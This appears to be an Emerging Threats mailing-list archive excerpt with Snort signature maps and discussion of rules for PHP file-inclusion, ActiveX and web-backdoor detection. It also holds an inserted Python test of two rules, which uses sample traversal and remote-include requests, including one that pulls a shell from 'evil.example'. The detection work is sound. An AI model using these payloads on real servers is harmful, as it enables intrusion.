2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (71):
2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From jonkman at jonkmans.com Tue May 12 16:03:44 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 16:03:44 -0400
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
In-Reply-To: <20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>
References: <1242090023.7228.257.camel@localhost> <20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>
Message-ID: <4A09D620.7040604@jonkmans.com>

Good points. The reason they're in the exploit link even though categorized policy is that they're part of the flowbits chain to detect a successful vnc auth. Doesn't make sense if you're trying to read that flowbit machine and these 2 are off in policy.

But, I'll put a note in the file and put these where they belong.
Matt

Jack Pepper wrote:
> Quoting Frank Knobbe :
>
>> SIDs 2002922 + 2002920 are in the exploit category, even though they
>> carry an ET POLICY label. Now, I'm aware there was that old RealVNC issue
>> a long while back. We should either move those sigs from EXPLOIT to the
>> POLICY group, or perhaps remove these sigs altogether.
>
> I lobby for putting them into the POLICY group. The rule does not
> detect an exploit, it detects an out-of-date or misconfigured VNC
> (policy).
>
> jp
>

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From signatures at stillsecure.com Wed May 13 08:30:11 2009
From: signatures at stillsecure.com (signatures)
Date: Wed, 13 May 2009 06:30:11 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-13-2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292E@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1. WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxstats.php?"; nocase; uricontent:"hm="; nocase; content:"../"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009058; rev:1;)

2. WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxstats.php?"; nocase; uricontent:"hm="; nocase; pcre:"/hm=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009059; rev:1;)

3. WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxupdate.php?"; nocase; uricontent:"hm="; nocase; content:"../"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009060; rev:1;)

4. WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxupdate.php?"; nocase; uricontent:"hm="; nocase; pcre:"/hm=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009061; rev:1;)

5. WEB-PHP LnBlog showblog.php plugin Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP LnBlog showblog.php plugin Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/showblog.php?"; nocase; uricontent:"plugin="; nocase; content:"../"; classtype:web-application-attack; reference:bugtraq,31459; reference:url,secunia.com/advisories/32032; reference:url,milw0rm.com/exploits/6601; sid:2009062; rev:1;)

6. WEB-PHP MiGCMS content_image.class.php GLOBALS Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP MiGCMS content_image.class.php GLOBALS Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/content_image.class.php?"; nocase; uricontent:"GLOBALS[application][app_root]="; nocase; pcre:"/GLOBALS\[application\]\[app_root\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5901; reference:bugtraq,29874; sid:2009075; rev:1;)

7. WEB-PHP MiGCMS collection.class.php GLOBALS Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP MiGCMS collection.class.php GLOBALS Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/collection.class.php?"; nocase; uricontent:"GLOBALS[application][app_root]="; nocase; pcre:"/GLOBALS\[application\]\[app_root\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5901; reference:bugtraq,29874; sid:2009076; rev:1;)

8. WEB-PHP phpDMCA adodb-errorpear.inc.php Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP phpDMCA adodb-errorpear.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/adodb-errorpear.inc.php?"; nocase; uricontent:"ourlinux_root_path="; pcre:"/ourlinux_root_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5897; reference:bugtraq,29880; sid:2009077; rev:1;)

9. WEB-PHP phpDMCA adodb-pear.inc.php Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP phpDMCA adodb-pear.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/adodb-pear.inc.php?"; nocase; uricontent:"ourlinux_root_path="; pcre:"/ourlinux_root_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5897; reference:bugtraq,29880; sid:2009078; rev:1;)

10. WEB-ATTACKS Chance-i DiViS-Web DVR System ActiveX Control AddSiteEx Method Buffer Overflow

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Chance-i DiViS-Web DVR System ActiveX Control AddSiteEx Method Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"66F7F252-3FE1-4650-B1E5-94B2A38271C5"; nocase; distance:0; content:"AddSiteEx"; nocase; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8391; reference:bugtraq,34468; sid:20097408; rev:1;)

Looking forward to your comments, if any...

Thanks & Regards,
StillSecure
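To see what the HIOX LFI/RFI pair above actually fires on, here is an added emulation of their matching logic in Python. It is not part of the StillSecure submission and not Snort code; it assumes Snort 2 semantics in which uricontent and a /U pcre are evaluated against the http_inspect normalized URI while a bare content is evaluated against the raw payload, and it runs both rules over constructed request lines (the host, paths and payloads are made up for the test):

```python
import re
from urllib.parse import unquote

# Constructed request lines (not taken from the list posting) that exercise
# the hioxstats.php LFI/RFI pair; host and paths are invented.
SAMPLE_REQUESTS = [
    "GET /stats/hioxstats.php?hm=../../../../etc/passwd HTTP/1.1",            # plain traversal
    "GET /stats/hioxstats.php?hm=http://evil.example/shell.txt? HTTP/1.1",     # remote include
    "GET /stats/hioxstats.php?hm=%2e%2e/%2e%2e/etc/passwd HTTP/1.1",          # percent-encoded traversal
    "GET /stats/hioxstats.php?hm=php://input HTTP/1.1",                        # php:// wrapper
    "GET /stats/hioxstats.php?hm=data://text/plain;base64,PD9waHA HTTP/1.1",   # data:// wrapper, not in the pcre
    "GET /stats/hioxstats.php?hm=1 HTTP/1.1",                                  # benign
    "POST /stats/hioxstats.php?hm=../x HTTP/1.1",                              # not a GET
]

# pcre:"/hm=\s*(https?|ftps?|php)\:\//Ui" from the RFI rule: /U applies it to the
# normalized URI, /i makes it case-insensitive.
RFI_SCHEME = re.compile(r"hm=\s*(https?|ftps?|php)\:\/", re.I)


def split_request_line(request_line):
    """Return (method, raw_uri) from an HTTP request line."""
    method, uri, _version = request_line.split(" ", 2)
    return method, uri


def normalize_uri(uri):
    """Stand-in for the http_inspect normalized URI buffer: percent-decoding only."""
    return unquote(uri)


def uri_preconditions(request_line, script, param):
    """content:"GET "; depth:4; plus the two nocase uricontent checks.
    Returns the normalized URI on success, None otherwise."""
    if not request_line.startswith("GET "):
        return None
    _method, uri = split_request_line(request_line)
    norm = normalize_uri(uri)
    if script.lower() not in norm.lower() or param.lower() not in norm.lower():
        return None
    return norm


def rule_lfi(request_line, script="/hioxstats.php?", param="hm=", traversal_on_normalized=False):
    """LFI rule as posted: the traversal check is a bare content:"../", which is
    matched against the raw payload rather than the normalized URI.
    traversal_on_normalized=True models swapping it for uricontent:"../"."""
    norm = uri_preconditions(request_line, script, param)
    if norm is None:
        return False
    haystack = norm if traversal_on_normalized else request_line
    return "../" in haystack


def rule_rfi(request_line, script="/hioxstats.php?", param="hm="):
    """RFI rule as posted: preconditions plus the scheme pcre on the normalized URI."""
    norm = uri_preconditions(request_line, script, param)
    if norm is None:
        return False
    return RFI_SCHEME.search(norm) is not None


def evaluate(requests=SAMPLE_REQUESTS):
    """Run both rules over the sample set; returns [(request, lfi_hit, rfi_hit), ...]."""
    return [(r, rule_lfi(r), rule_rfi(r)) for r in requests]


if __name__ == "__main__":
    for req, lfi, rfi in evaluate():
        print(f"LFI={lfi!s:5} RFI={rfi!s:5} {req}")
```

Two things fall out of the run: the percent-encoded traversal (`%2e%2e/`) passes the uricontent checks but never reaches the raw `content:"../"`, while `uricontent:"../"` would see the decoded form; and `data://` is outside the `(https?|ftps?|php)` alternation, so that wrapper is not covered by the RFI rule as written. A bare `content:"../"` also matches anywhere in the payload, headers included, which is a false-positive source that the uricontent form avoids.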
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090513/2ee29d0f/attachment.html From pepperjack at afferentsecurity.com Wed May 13 09:02:27 2009 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Wed, 13 May 2009 08:02:27 -0500 Subject: [Emerging-Sigs] adjustment to 2009345 Message-ID: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> it needs a limit threshold for those cases where NTLM is in use: alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established; content:"HTTP/1."; depth:7; content:" 401"; within:5; classtype:attempted-recon; reference:url,doc.emergingthreats.net/2009345; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3;threshold: type limit, track by_src, seconds 1200, count 1;) jp -- Framework? I don't need no stinking framework! ---------------------------------------------------------------- @fferent Security Labs: Isolate/Insulate/Innovate http://www.afferentsecurity.com From jonkman at jonkmans.com Wed May 13 11:28:52 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 13 May 2009 11:28:52 -0400 Subject: [Emerging-Sigs] adjustment to 2009345 In-Reply-To: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com> Message-ID: <4A0AE734.8080507@jonkmans.com> How about we go the other way and have a threshold. Like 5 hits to trip it in 2 minutes. Would that eliminate the ntlm default tried you are seeing? 
matt Jack Pepper wrote: > it needs a limit threshold for those cases where NTLM is in use: > > alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET > ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established; > content:"HTTP/1."; depth:7; content:" 401"; within:5; > classtype:attempted-recon; > reference:url,doc.emergingthreats.net/2009345; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3;threshold: type limit, track by_src, seconds 1200, count > 1;) > > > jp > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From phatbuckett at gmail.com Wed May 13 11:54:02 2009 From: phatbuckett at gmail.com (Darren Spruell) Date: Wed, 13 May 2009 08:54:02 -0700 Subject: [Emerging-Sigs] Bzub/Cimuz/Tanspy rule alteration/addition Message-ID: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32.Agent Reporting User Activity"; flow:established,to_server; uricontent:".php?phid="; nocase; uricontent:"&ver="; nocase; uricontent:"&lg="; nocase; pcre:"/User-Agent\:[^\n]+z/i"; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2002792; 